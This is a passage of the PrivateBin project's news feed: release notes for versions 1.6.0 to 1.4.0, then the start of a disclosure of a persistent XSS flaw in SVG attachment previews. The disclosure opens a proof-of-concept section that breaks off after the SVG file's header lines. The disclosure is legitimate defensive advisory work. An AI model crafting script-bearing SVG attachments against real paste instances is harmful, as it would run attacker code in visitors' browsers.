&lt;li&gt;We do have a decent unit test code coverage, so it is an environment forgiving of mistakes. You may still introduce logical flaws or issues in new features, not yet covered in the tests, but you can rely on the tests preventing any regressions in other areas.&lt;/li&gt;
&lt;li&gt;You don't have to be proficient in multiple programming languages, there are a lot of things to improve within either the JavaScript or PHP areas that don't need you to understand the other side, beyond their shared API.&lt;/li&gt;
&lt;li&gt;It can be an opportunity to learn about continuous integration tools to automate tasks like tests, security scans, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools to get you started. For any questions, you can chat with the maintainers in the &lt;a href="https://github.com/PrivateBin/PrivateBin/discussions"&gt;discussion&lt;/a&gt; area or reach us via &lt;a href="mailto:support@privatebin.org"&gt;email&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.6.0 - Adding new translations and dropping support for PHP &lt; 7.3</title><link href="https://privatebin.info/news/v1.6.0-release.html" rel="alternate"/><published>2023-09-11T20:15:00+02:00</published><updated>2023-09-11T20:15:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2023-09-11:/news/v1.6.0-release.html</id><summary type="html">&lt;p&gt;This release adds translations for Japanese &amp;amp; Arabic and increases the minimal required PHP version to 7.3.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release adds translations for Japanese &amp;amp; Arabic and increases the minimal required PHP version to 7.3.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In addition to the two new translations for the Japanese &amp;amp; Arabic languages, the Email-button is now a configurable option, but still enabled by default.&lt;/p&gt;
&lt;p&gt;The minimum supported PHP version is now 7.3, due to having upgraded the PHP unit test framework which no longer supports older PHP releases. This simplifies our development (we no longer need to maintain a parallel branch that ensured PHP 8 compatibility) and let us drop a library that provided a more cryptographically secure random function to PHP 5.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;container images using the nginx web server with php-fpm&lt;/a&gt; and one using the &lt;a href="https://hub.docker.com/r/privatebin/unit-alpine/"&gt;nginx unit application server&lt;/a&gt;, that include the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.5.2&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translations for Japanese &amp;amp; Arabic&lt;/li&gt;
&lt;li&gt;ADDED: Configuration option to disable Email button (#1164)&lt;/li&gt;
&lt;li&gt;CHANGED: Minimum required PHP version is 7.3, due to upgrading PHPunit (#707)&lt;/li&gt;
&lt;li&gt;CHANGED: Removed PHP 5 polyfill for random_bytes()&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;What can we offer you in return for your help?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We can offer you our mentorship, if this is your first time participating as a maintainer of an open source software project. We can guide you through submitting your first pull requests and work with you to ensure your change fulfils the communities quality standards, gets merged and makes it into a release.&lt;/li&gt;
&lt;li&gt;Your work gets publicly credited. This can help you build up a resume, showing off your growing skill set, in programming as well as your soft skills.&lt;/li&gt;
&lt;li&gt;PrivateBin is a smaller project. If you'd like to learn how to participate and contribute in an open source git project, this should be less overwhelming then larger projects.&lt;/li&gt;
&lt;li&gt;We do have a decent unit test code coverage, so it is an environment forgiving of mistakes. You may still introduce logical flaws or issues in new features, not yet covered in the tests, but you can rely on the tests preventing any regressions in other areas.&lt;/li&gt;
&lt;li&gt;You don't have to be proficient in multiple programming languages, there are a lot of things to improve within either the JavaScript or PHP areas that don't need you to understand the other side, beyond their shared API.&lt;/li&gt;
&lt;li&gt;It can be an opportunity to learn about continuous integration tools to automate tasks like tests, security scans, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools to get you started. For any questions, you can chat with the maintainers in the &lt;a href="https://github.com/PrivateBin/PrivateBin/discussions"&gt;discussion&lt;/a&gt; area or reach us via &lt;a href="mailto:support@privatebin.org"&gt;email&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.5.2 - S3 storage improvements &amp; library updates</title><link href="https://privatebin.info/news/v1.5.2-release.html" rel="alternate"/><published>2023-07-09T09:30:00+02:00</published><updated>2023-07-09T09:30:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2023-07-09:/news/v1.5.2-release.html</id><summary type="html">&lt;p&gt;This release contains an improvement for the S3 storage &amp;amp; updates several libraries.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release contains an improvement for the S3 storage &amp;amp; updates several libraries.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This patch release allows the AWS SDK to use default credential provider chain when using the S3 storage backend, exposes the used JSON-LD types in the API, addresses PHP 8.2 deprecation warnings and includes several updated libraries, including some security fixes.&lt;/p&gt;
&lt;p&gt;When using the S3 storage backend, you now have the option of passing the S3 credential configuration in other ways than just the PrivateBin configuration file. If the &lt;code&gt;credentials&lt;/code&gt; are not set in configuration, the AWS SDK will use the default credentials provider chain, which will look for credentials in a few places automatically, including environment variables or instance roles. For details on these, see the &lt;a href="https://docs.aws.amazon.com/sdk-for-php/v3/developer-guide/guide_credentials.html#default-credential-chain"&gt;SDK's documentation on the default credentials provider chain&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The updated DOMpurify &amp;amp; jQuery libraries contain some security fixes. While we are not aware that these could be used with PrivateBin, for example to bypass DOMpurify filtering of the user provided paste contents to inject malicious code displayed to visitors, upgrading these prevents these from becoming an issue.&lt;/p&gt;
&lt;p&gt;Finally, the administration script introduced in the last release, made use of a form of string interpolation that got deprecated in PHP 8.2, causing it to emit warning messages, when running it on that PHP version. It was the only area that needed any changes for PHP 8.2 and our &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;container images&lt;/a&gt; have already been using PHP 8.2 for a few months without any issues.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade all instances, due to the security fixes in the included DOMpurify &amp;amp; jQuery libraries.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;container images using the nginx web server with php-fpm&lt;/a&gt; and one using the &lt;a href="https://hub.docker.com/r/privatebin/unit-alpine/"&gt;nginx unit application server&lt;/a&gt;, that include the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.5.1&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Allow AWS SDK to use default credential provider chain for S3Storage (#1070)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.0.4 &amp;amp; jQuery 3.7.0&lt;/li&gt;
&lt;li&gt;FIXED: Addressed PHP 8.2 deprecation warnings (#1092)&lt;/li&gt;
&lt;li&gt;FIXED: Expose types JSON-LD incl. configured expiration dates (#1045)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;What can we offer you in return for your help?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We can offer you our mentorship, if this is your first time participating as a maintainer of an open source software project. We can guide you through submitting your first pull requests and work with you to ensure your change fulfils the communities quality standards, gets merged and makes it into a release.&lt;/li&gt;
&lt;li&gt;Your work gets publicly credited. This can help you build up a resume, showing off your growing skill set, in programming as well as your soft skills.&lt;/li&gt;
&lt;li&gt;PrivateBin is a smaller project. If you'd like to learn how to participate and contribute in an open source git project, this should be less overwhelming then larger projects.&lt;/li&gt;
&lt;li&gt;We do have a decent unit test code coverage, so it is an environment forgiving of mistakes. You may still introduce logical flaws or issues in new features, not yet covered in the tests, but you can rely on the tests preventing any regressions in other areas.&lt;/li&gt;
&lt;li&gt;You don't have to be proficient in multiple programming languages, there are a lot of things to improve within either the JavaScript or PHP areas that don't need you to understand the other side, beyond their shared API.&lt;/li&gt;
&lt;li&gt;It can be an opportunity to learn about continuous integration tools to automate tasks like tests, security scans, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools to get you started. For any questions, you can chat with the maintainers in the &lt;a href="https://github.com/PrivateBin/PrivateBin/discussions"&gt;discussion&lt;/a&gt; area or reach us via &lt;a href="mailto:support@privatebin.org"&gt;email&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next minor release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.5.1 - Filesystem purge lookup change &amp; administration script</title><link href="https://privatebin.info/news/v1.5.1-release.html" rel="alternate"/><published>2022-12-24T06:30:00+01:00</published><updated>2022-12-24T06:30:00+01:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2022-12-24:/news/v1.5.1-release.html</id><summary type="html">&lt;p&gt;This release reverts a filesystem purge lookup change and adds a script for administrative tasks.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release reverts a filesystem purge lookup change and adds a script for administrative tasks.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This patch release partially reverts a change to the filesystem backend's purge lookup, adds a script for administrative tasks, catches JSON errors when malformed pastes get uploaded and includes updated libraries for GCS and S3 backends.&lt;/p&gt;
&lt;p&gt;Release 1.5.0 contained a simplification to the filesystem backend's purge logic, which could lead to very resource intensive purge cycles on instances with a large storage footprint. This release retains the &lt;a href="https://en.wikipedia.org/wiki/Glob_(programming)"&gt;glob pattern&lt;/a&gt;, but re-adds the limited and randomized lookup. The limit gives up searching after 10 times the purge batch size and the randomization prevents re-opening the same, non-expired pastes over and over. Without these mechanisms, eventually all expired pastes got purged, and every further purge reads all pastes from disk, without finding anything, which wastes time and resources.&lt;/p&gt;
&lt;p&gt;PrivateBin now adds another script to help perform administrative tasks. The new script, called &lt;code&gt;administration&lt;/code&gt;, helps with deleting pastes, removing empty directories, when using the filesystem backend, purging all expired pastes at once and gathering statistics on an instance.&lt;/p&gt;
&lt;p&gt;Deleting pastes is relatively easy to do manually with the filesystem and database backends, but more difficult on GCS or S3 storage. The new tool works the same, regardless of backend, letting server administrators delete pastes by ID.&lt;/p&gt;
&lt;p&gt;When using the filesystem backend, the purge does not remove empty directories, as they can be reused by new pastes with IDs starting on the same first 2 bytes. These empty directories can now be removed, if desired.&lt;/p&gt;
&lt;p&gt;The administration script also can issue a full purge cycle. Instances could disable the automatic purge on paste/comment creation in their configuration and instead use a cron job to run full purges on a schedule. Or it could be issued before a backup, to avoid archiving expired data.&lt;/p&gt;
&lt;p&gt;Finally, the script can be used to gather and display statistical information. This includes the total number of pastes the instance hosts, as well as how many of these are expired, of the burn-after-reading type, include discussions and what formatting they use (plain text, source code or markdown).&lt;/p&gt;
&lt;p&gt;The release includes smaller improvements to catch a JSON parsing exception when malformed pastes get uploaded to the API and updates the suggested library versions for GCS and S3 storage backends. We had gotten reports of the S3 library in 1.5.0 having emitted deprecation warnings on PHP 8.1.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade 1.5.0 instances using the (default) filesystem storage backend as well as instances using S3 storage and PHP &amp;gt; 8.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.5.0&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: script for administrative tasks: deleting pastes (#274), removing empty directories (#277), purging expired pastes (#276) &amp;amp; statistics (#319)&lt;/li&gt;
&lt;li&gt;FIXED: Revert Filesystem purge to limited and randomized lookup (#1030)&lt;/li&gt;
&lt;li&gt;FIXED: Catch JSON decode errors when invalid data gets sent to the API (#1030)&lt;/li&gt;
&lt;li&gt;FIXED: Support sorting v1 format in mixed version comments in Filesystem backend (#1030)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started. For any questions, you can also chat with the maintainers in the &lt;a href="https://github.com/PrivateBin/PrivateBin/discussions"&gt;discussion&lt;/a&gt; area.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next regular release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.5.0 - S3 Storage backend, storage migration script &amp; adding new translations</title><link href="https://privatebin.info/news/v1.5.0-release.html" rel="alternate"/><published>2022-12-11T06:30:00+01:00</published><updated>2022-12-11T06:30:00+01:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2022-12-11:/news/v1.5.0-release.html</id><summary type="html">&lt;p&gt;This release improves the safety of the SVG attachment preview, adds Google Cloud Storage and Oracle database support, and new translations.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release adds an S3 storage backend, a storage migration script, and new translations.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This minor release adds support for Simple Storage Service (S3), a storage migration script, adds four new languages to the translations and includes updated libraries.&lt;/p&gt;
&lt;p&gt;The new S3 storage backend can be used with Ceph, Amazon Web Services or other S3 providers. A migration script was also provided, which can migrate existing instances from one storage backend to another, including in between the same storage backend types, but with different configurations (i.e. from one directory to another or one database to another).&lt;/p&gt;
&lt;p&gt;The release includes several smaller improvements to the MariaDB and MySQL support. It reverts to CREATE INDEX without IF NOT EXISTS clauses (introduced in 1.4.0) which are not supported in MySQL. It also avoids requiring the &lt;code&gt;SUPER&lt;/code&gt; privilege for the &lt;code&gt;sql_mode&lt;/code&gt; added in 1.4.0. Indexes now also make use of the table prefix, to support multiple instances sharing a single database.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://jdenticon.com/"&gt;Jdenticons&lt;/a&gt; were added as a fourth option for comment icons, in addition to identicons and vizhash (and using none). The new icon type adds a different style and they don't require the PHP GD module to be generated. They are larger in size than identicons, a bit smaller than vizhash and &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/1008#issuecomment-1306093364"&gt;slower to generate&lt;/a&gt; than either.&lt;/p&gt;
&lt;p&gt;If using the YOURLS URL shortener with a signature and would like to keep it hidden, as of this release a server side integration via a proxy can be used, &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#yourls"&gt;storing the signature only in configuration&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade 1.4.x instances using MariaDB backend and any instance that would like to make use of any of the new features or translations.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.4.0&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: script for data storage backend migrations (#1012)&lt;/li&gt;
&lt;li&gt;ADDED: Translations for Turkish, Slovak, Greek and Thai&lt;/li&gt;
&lt;li&gt;ADDED: S3 Storage backend (#994)&lt;/li&gt;
&lt;li&gt;ADDED: Jdenticons as an option for comment icons (#793)&lt;/li&gt;
&lt;li&gt;CHANGED: Avoid &lt;code&gt;SUPER&lt;/code&gt; privilege for setting the &lt;code&gt;sql_mode&lt;/code&gt; for MariaDB/MySQL (#919)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 2.4.6, jQuery 3.6.1, Showdown 2.1.0 &amp;amp; zlib 1.2.13&lt;/li&gt;
&lt;li&gt;FIXED: Revert to CREATE INDEX without IF NOT EXISTS clauses, to support MySQL (#943)&lt;/li&gt;
&lt;li&gt;FIXED: Apply table prefix to indexes as well, to support multiple instances sharing a single database (#943)&lt;/li&gt;
&lt;li&gt;FIXED: YOURLS integration via new proxy, storing signature in configuration (#725)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started. For any questions, you can also chat with the maintainers in the &lt;a href="https://github.com/PrivateBin/PrivateBin/discussions"&gt;discussion&lt;/a&gt; area.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next regular release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.4.0 - Hardening the attachment preview, Google Cloud Storage and Oracle database support &amp; adding new translations</title><link href="https://privatebin.info/news/v1.4.0-release.html" rel="alternate"/><published>2022-04-09T18:00:00+02:00</published><updated>2022-04-09T18:00:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2022-04-09:/news/v1.4.0-release.html</id><summary type="html">&lt;p&gt;This release improves the safety of the SVG attachment preview, adds Google Cloud Storage and Oracle database support, and new translations.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release improves the safety of the SVG attachment preview, adds Google Cloud Storage and Oracle database support, and new translations.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This minor release addresses a security issue with the SVG attachment preview, adds support for Google Cloud Storage (GCS) and Oracle databases, adds four new languages to the translations and includes updated libraries.&lt;/p&gt;
&lt;p&gt;The storage system got reworked as part of the new Google Cloud Storage class and when not using the default file storage, the server salt and purge and traffic limiter items are now stored as part of the selected storage backend. It is now possible to run PrivateBin with database or GCS backend without requiring any write access to the data directory - automatic migrations run the first time any of these get accessed and found to be still present in the filesystem.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade 1.3.x instances to improve the resolved security issues. At the very minimum, please update your CSP headers in the configuration file to our currently recommended settings. You can check the headers of your instance via our new &lt;a href="https://privatebin.info/directory/check"&gt;instance check service&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.3.5&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translations for Corsican, Estonian, Finnish and Lojban&lt;/li&gt;
&lt;li&gt;ADDED: new HTTP headers improving security (#765)&lt;/li&gt;
&lt;li&gt;ADDED: Download button for paste text (#774)&lt;/li&gt;
&lt;li&gt;ADDED: Opt-out of federated learning of cohorts (FLoC) (#776)&lt;/li&gt;
&lt;li&gt;ADDED: Configuration option to exempt IPs from the rate-limiter (#787)&lt;/li&gt;
&lt;li&gt;ADDED: Google Cloud Storage backend support (#795)&lt;/li&gt;
&lt;li&gt;ADDED: Oracle database support (#868)&lt;/li&gt;
&lt;li&gt;ADDED: Configuration option to limit paste creation and commenting to certain IPs (#883)&lt;/li&gt;
&lt;li&gt;ADDED: Set CSP also as meta tag, to deal with misconfigured webservers mangling the HTTP header&lt;/li&gt;
&lt;li&gt;ADDED: Sanitize SVG preview, preventing script execution in instance context&lt;/li&gt;
&lt;li&gt;CHANGED: Language selection cookie only transmitted over HTTPS (#472)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: base-x 4.0.0, bootstrap 3.4.1 (JS), DOMpurify 2.3.6, ip-lib 1.18.0, jQuery 3.6.0, random_compat 2.0.21, Showdown 2.0.3 &amp;amp; zlib 1.2.12&lt;/li&gt;
&lt;li&gt;CHANGED: Removed automatic &lt;code&gt;.ini&lt;/code&gt; configuration file migration (#808)&lt;/li&gt;
&lt;li&gt;CHANGED: Removed configurable &lt;code&gt;dir&lt;/code&gt; for &lt;code&gt;traffic&lt;/code&gt; &amp;amp; &lt;code&gt;purge&lt;/code&gt; limiters (#419)&lt;/li&gt;
&lt;li&gt;CHANGED: Server salt, traffic and purge limiter now stored in the storage backend (#419)&lt;/li&gt;
&lt;li&gt;CHANGED: Drop support for attachment download in IE&lt;/li&gt;
&lt;li&gt;FIXED: Error when attachments are disabled, but paste with attachment gets displayed&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next regular release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Vulnerability Report: Persistent Cross-site Scripting (XSS) vulnerability in SVG attachments in PrivateBin &lt; v1.4.0</title><link href="https://privatebin.info/reports/vulnerability-2022-04-09.html" rel="alternate"/><published>2022-04-09T18:00:00+02:00</published><updated>2022-04-09T18:00:00+02:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2022-04-09:/reports/vulnerability-2022-04-09.html</id><summary type="html">&lt;p&gt;An XSS vulnerability was found in the SVG attachment preview, which has been mitigated in &lt;a href="https://privatebin.info/news/v1.4.0-release.html"&gt;PrivateBin v1.4.0&lt;/a&gt;.&lt;/p&gt;</summary><content type="html">&lt;p&gt;In PrivateBin &amp;lt; v1.4.0 a cross-site scripting (XSS) vulnerability was found. The vulnerability is present since attachments with image preview got introduced in v0.21 of the project, which was at the time still called ZeroBin. The issue is caused by the fact that SVGs can contain JavaScript. This can allow an attacker to execute code, if the user opens a paste with a specifically crafted SVG attachment, and interacts with the preview image and the instance isn't protected by an appropriate content security policy.&lt;/p&gt;
&lt;p&gt;As a consequence, we have mitigated the vulnerability in the preview and urge server administrators to either &lt;strong&gt;upgrade&lt;/strong&gt; to a version with the fix or to ensure the content security policy of their instance is set correctly, ideally both. Additionally, we expanded our &lt;a href="https://privatebin.info/directory/check"&gt;directory listing tool with a checking mechanism&lt;/a&gt; and &lt;strong&gt;highly suggest server administrators to check their instance there&lt;/strong&gt; and, should there be a warning regarding the content security policy &lt;strong&gt;adjust the CSP to our suggested one&lt;/strong&gt;, as it is shown in the configuration preset.&lt;/p&gt;
&lt;h2&gt;Proof of concept&lt;/h2&gt;
&lt;p&gt;The vulnerability can be triggered as following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Create the following SVG as a file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; standalone=&amp;quot;no&amp;quot;?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE svg PUBLIC &amp;quot;-//W3C//DTD SVG 1.1//EN&amp;quot; &amp;quot;http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd&amp;quot;&amp;gt;&lt;/span&gt;

